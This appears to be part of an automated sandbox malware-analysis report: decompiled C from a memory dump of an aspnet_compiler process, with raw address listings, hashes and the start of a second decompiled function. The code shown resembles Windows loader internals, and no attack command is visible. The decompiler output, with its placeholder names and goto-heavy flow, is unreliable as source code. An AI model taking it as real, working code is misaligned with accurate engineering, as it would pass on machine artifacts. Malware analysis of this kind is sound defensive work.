				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x133d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01256600(0x13352d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1337b9c; // 0x0
							_t281 = L01264620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0128F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1337b90; // 0x77290000
								if(_t384 == 0) {
									_t353 =  *0x1337b8c; // 0xdf2b48
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01262280(_t200, 0x13384d8);
									_t277 =  *0x13385f4; // 0xdf3038
									_t351 =  *0x13385f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xdf2fd0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0125FFB0(_t287, _t353, 0x13384d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0129CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01256600(0x13352d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01257926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x133b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E012CE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1338472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x133b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x133b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01262280(_t250, 0x13384d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01283898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0125FFB0(_t293, _t353, 0x13384d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E012837F5(_t353, 0);
																}
																E01280413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01279B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E012702D6(_t174);
																}
																L012677F0( *0x1337b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0127C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0125EC7F(_t353);
										L012719B8(_t287, 0, _t353, 0);
										_t200 = E0124F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x133b2f8 |  *0x133b2fc) == 0 || ( *0x133b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0128B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x133b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E012F6B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E012F6AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0125E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0125EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01289730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0125E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01258F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01283C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0125d5f2
0x0125d5f5
0x0125d5f5
0x0125d5fd
0x0125d600
0x0125d60a
0x0125d60d
0x0125d617
0x0125d61d
0x0125d627
0x0125d62e
0x0125d911
0x0125d913
0x00000000
0x0125d919
0x0125d919
0x0125d919
0x0125d634
0x0125d634
0x0125d634
0x0125d634
0x0125d640
0x0125d8bf
0x00000000
0x0125d646
0x0125d646
0x0125d64d
0x0125d652
0x012ab2fc
0x012ab2fc
0x012ab302
0x012ab33b
0x012ab341
0x00000000
0x012ab304
0x012ab304
0x012ab319
0x012ab31e
0x012ab324
0x012ab326
0x012ab332
0x012ab347
0x012ab34c
0x012ab351
0x012ab35a
0x00000000
0x012ab328
0x012ab328
0x00000000
0x012ab328
0x012ab326
0x0125d658
0x0125d658
0x0125d65b
0x0125d665
0x00000000
0x0125d66b
0x0125d66b
0x0125d66b
0x0125d66b
0x0125d66d
0x0125d672
0x0125d67a
0x00000000
0x00000000
0x0125d680
0x0125d686
0x0125d8ce
0x0125d8d4
0x0125d8dd
0x0125d8e0
0x0125d68c
0x0125d691
0x0125d69d
0x0125d6a2
0x0125d6a7
0x0125d6b0
0x0125d6b5
0x0125d6e0
0x0125d6b7
0x0125d6b7
0x0125d6b9
0x0125d6b9
0x0125d6bb
0x0125d6bd
0x0125d6ce
0x0125d6d0
0x0125d6d2
0x012ab363
0x012ab365
0x00000000
0x012ab36b
0x00000000
0x012ab36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0125d6bf
0x0125d6bf
0x0125d6e5
0x0125d6e7
0x0125d6e9
0x0125d6ec
0x0125d6ec
0x0125d6ef
0x0125d6f5
0x0125d6f9
0x0125d6fb
0x0125d6fd
0x0125d701
0x0125d703
0x0125d70a
0x0125d70a
0x0125d701
0x0125d710
0x0125d710
0x0125d6c1
0x0125d6c1
0x0125d6c6
0x012ab36d
0x012ab36f
0x00000000
0x012ab375
0x012ab375
0x012ab375
0x00000000
0x012ab375
0x00000000
0x0125d6cc
0x0125d6d8
0x0125d6d8
0x0125d6d8
0x00000000
0x0125d6c6
0x0125d6bf
0x00000000
0x0125d6da
0x0125d6da
0x0125d716
0x0125d71b
0x0125d720
0x0125d726
0x0125d726
0x0125d72d
0x00000000
0x0125d733
0x0125d739
0x0125d742
0x0125d750
0x0125d758
0x0125d764
0x0125d776
0x0125d77a
0x0125d783
0x0125d928
0x0125d92c
0x0125d93d
0x0125d944
0x0125d94f
0x0125d954
0x0125d956
0x0125d95f
0x0125d961
0x0125d973
0x0125d973
0x0125d956
0x0125d944
0x0125d92c
0x0125d78b
0x012ab394
0x0125d791
0x0125d798
0x012ab3a3
0x012ab3bb
0x012ab3bb
0x0125d7a5
0x0125d866
0x0125d870
0x0125d892
0x0125d898
0x0125d89e
0x0125d8a0
0x0125d8a6
0x0125d8ac
0x0125d8ae
0x0125d8b4
0x0125d8b4
0x0125d8ae
0x0125d7a5
0x0125d78b
0x0125d7b1
0x012ab3c5
0x012ab3c5
0x0125d7c3
0x0125d7ca
0x0125d7e5
0x0125d7eb
0x0125d8eb
0x0125d8ed
0x00000000
0x0125d8f3
0x0125d8f3
0x0125d8f3
0x00000000
0x0125d8ed
0x0125d7cc
0x0125d7cc
0x0125d7d2
0x00000000
0x0125d7d4
0x0125d7d4
0x0125d7d7
0x0125d7df
0x012ab3d4
0x012ab3d9
0x012ab3dc
0x012ab3dc
0x012ab3df
0x012ab3e2
0x012ab468
0x012ab46d
0x012ab46f
0x012ab46f
0x012ab475
0x0125d8f8
0x0125d8f9
0x0125d8fd
0x012ab3e8
0x012ab3e8
0x012ab3eb
0x012ab3ed
0x00000000
0x012ab3ef
0x012ab3ef
0x012ab3f1
0x012ab3f4
0x012ab3fe
0x012ab404
0x012ab409
0x012ab40e
0x012ab410
0x012ab410
0x012ab414
0x012ab414
0x012ab41b
0x012ab420
0x012ab423
0x012ab425
0x012ab427
0x012ab42a
0x012ab42d
0x012ab42d
0x012ab42a
0x012ab432
0x012ab436
0x012ab438
0x012ab43b
0x012ab43b
0x012ab449
0x012ab44e
0x012ab454
0x012ab458
0x012ab458
0x012ab45d
0x00000000
0x012ab45d
0x012ab3ed
0x00000000
0x00000000
0x00000000
0x0125d7df
0x0125d7d2
0x0125d7ca
0x012ab37c
0x012ab37e
0x012ab385
0x012ab38a
0x00000000
0x012ab38a
0x0125d742
0x0125d7f1
0x0125d7f8
0x012ab49b
0x012ab49b
0x0125d800
0x0125d837
0x0125d843
0x0125d845
0x0125d847
0x0125d84a
0x0125d84b
0x0125d84e
0x0125d857
0x0125d818
0x0125d824
0x0125d831
0x012ab4a5
0x012ab4ab
0x012ab4b3
0x012ab4b8
0x012ab4bb
0x00000000
0x012ab4c1
0x012ab4c1
0x012ab4c8
0x00000000
0x012ab4ce
0x012ab4d4
0x012ab4e1
0x012ab4e3
0x012ab4e5
0x00000000
0x012ab4eb
0x012ab4f0
0x012ab4f2
0x0125dac9
0x0125dacc
0x0125dacf
0x0125dad1
0x0125dd78
0x0125dd78
0x0125dcf2
0x00000000
0x0125dad7
0x0125dad9
0x0125dadb
0x00000000
0x00000000
0x0125dae1
0x0125dae1
0x0125dae4
0x0125dae6
0x012ab4f9
0x012ab4f9
0x012ab500
0x0125daec
0x0125daec
0x0125daf5
0x0125daf8
0x0125dafb
0x0125db03
0x0125db11
0x0125db16
0x0125db19
0x0125db1b
0x012ab52c
0x012ab531
0x012ab534
0x0125db21
0x0125db21
0x0125db24
0x0125dcd9
0x0125dce2
0x0125dce5
0x0125dd6a
0x0125dd6d
0x00000000
0x0125dd73
0x012ab51a
0x012ab51c
0x012ab51f
0x012ab524
0x00000000
0x012ab524
0x0125dce7
0x0125dce7
0x0125dce7
0x00000000
0x0125dce7
0x00000000
0x0125db2a
0x0125db2c
0x0125db31
0x0125db33
0x0125db36
0x0125db39
0x0125db3b
0x0125db66
0x0125db66
0x0125db3d
0x0125db3d
0x0125db3e
0x0125db46
0x0125db47
0x0125db49
0x0125db4c
0x0125db53
0x0125db55
0x0125db58
0x0125db5a
0x012ab50a
0x012ab50f
0x012ab512
0x0125db60
0x0125db60
0x0125db63
0x0125db63
0x00000000
0x0125db63
0x0125db5a
0x0125db3b
0x0125db24
0x0125db69
0x0125db69
0x0125db6c
0x0125db6f
0x0125db74
0x012ab557
0x012ab557
0x012ab55e
0x0125db7a
0x0125db7c
0x0125db7f
0x0125db82
0x0125db85
0x00000000
0x0125db8b
0x0125db8b
0x0125db8d
0x0125db9b
0x0125db9b
0x0125db9d
0x0125dba0
0x0125dba2
0x0125dba4
0x0125dba7
0x0125dba9
0x0125dbae
0x0125dbae
0x0125dbb1
0x0125dbb4
0x0125dbb4
0x0125dbb7
0x0125dbba
0x0125dcd2
0x0125dcd4
0x00000000
0x0125dbc0
0x0125dbc0
0x0125dbd2
0x0125dbd7
0x0125dbda
0x0125dbdd
0x0125dbdf
0x00000000
0x0125dbe5
0x0125dbe5
0x0125dbee
0x0125dbf1
0x012ab541
0x012ab544
0x00000000
0x012ab546
0x012ab546
0x00000000
0x012ab546
0x0125dbf7
0x0125dbf7
0x0125dbfd
0x0125dbfd
0x0125dbff
0x0125dc0b
0x0125dc15
0x0125dc1b
0x0125dc1d
0x0125dc21
0x0125dc21
0x0125dc23
0x0125dc23
0x0125dc26
0x0125dc29
0x0125dc2b
0x00000000
0x00000000
0x0125dc31
0x0125dc34
0x0125dc36
0x0125dcbf
0x0125dcbf
0x0125dcc2
0x00000000
0x0125dc3c
0x0125dc41
0x0125dc43
0x00000000
0x0125dc45
0x0125dc45
0x0125dc47
0x00000000
0x0125dc4d
0x0125dc4d
0x0125dc50
0x0125dc52
0x0125dc55
0x0125dcfa
0x0125dcfe
0x0125dd08
0x0125dd0a
0x0125dd0c
0x00000000
0x0125dd12
0x0125dd15
0x0125dd2d
0x0125dd2f
0x0125dd32
0x0125dd35
0x00000000
0x0125dd35
0x0125dc5b
0x0125dc5b
0x0125dc5e
0x0125dc61
0x0125dc64
0x0125dc67
0x0125dc67
0x0125dc6a
0x0125dc6c
0x0125dc8e
0x0125dc8e
0x0125dc91
0x0125dc93
0x0125dcce
0x0125dcce
0x0125dc95
0x0125dc9c
0x0125dc6e
0x0125dc72
0x0125dc75
0x0125dc77
0x0125dc79
0x012ab551
0x012ab551
0x00000000
0x0125dc7f
0x0125dc7f
0x0125dc81
0x00000000
0x0125dc83
0x0125dc86
0x0125dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0125dc88
0x0125dc81
0x0125dc79
0x0125dc6c
0x0125dc55
0x0125dc47
0x0125dc43
0x00000000
0x0125dc36
0x0125dc23
0x00000000
0x0125dbff
0x0125dbf1
0x0125dbdf
0x0125db8f
0x0125db92
0x0125db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0125db95
0x0125db8d
0x0125db85
0x0125db74
0x0125dc9f
0x0125dca2
0x0125dcb0
0x0125dcb0
0x0125dad1
0x012ab4e5
0x012ab4c8
0x00000000
0x00000000
0x00000000
0x0125d831
0x00000000
0x0125d800
0x012ab47f
0x012ab485
0x00000000
0x012ab485
0x0125d665
0x0125d652
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c66c1efea0c343b519fb98202d8eb7affab4f0158ca584d424c25520dc406b8
Instruction ID: 5336bdc7be2c6f4f368380ef0cfaf61fb4026c9a6bb9985cbbe4cb8d78f71b91
Opcode Fuzzy Hash: 0c66c1efea0c343b519fb98202d8eb7affab4f0158ca584d424c25520dc406b8
Instruction Fuzzy Hash: 8BE1E130A2035ACFEB74DF68C894B79BBB5BF85304F040199DE0997291D7749D81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0125849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0125849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x131f9c0);
				E0129D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1337b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0125CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01262280( *[fs:0x30], 0x1338550);
						_t139 =  *0x1337b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0127F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0125FFB0(_t193, _t235, 0x1338550);
								L5:
								return E0129D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01241C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1337b9c; // 0x0
							_t235 = L01264620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1337b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0127A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0125FFB0(_t193, _t235, 0x1338550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L012677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L012677F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1337b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
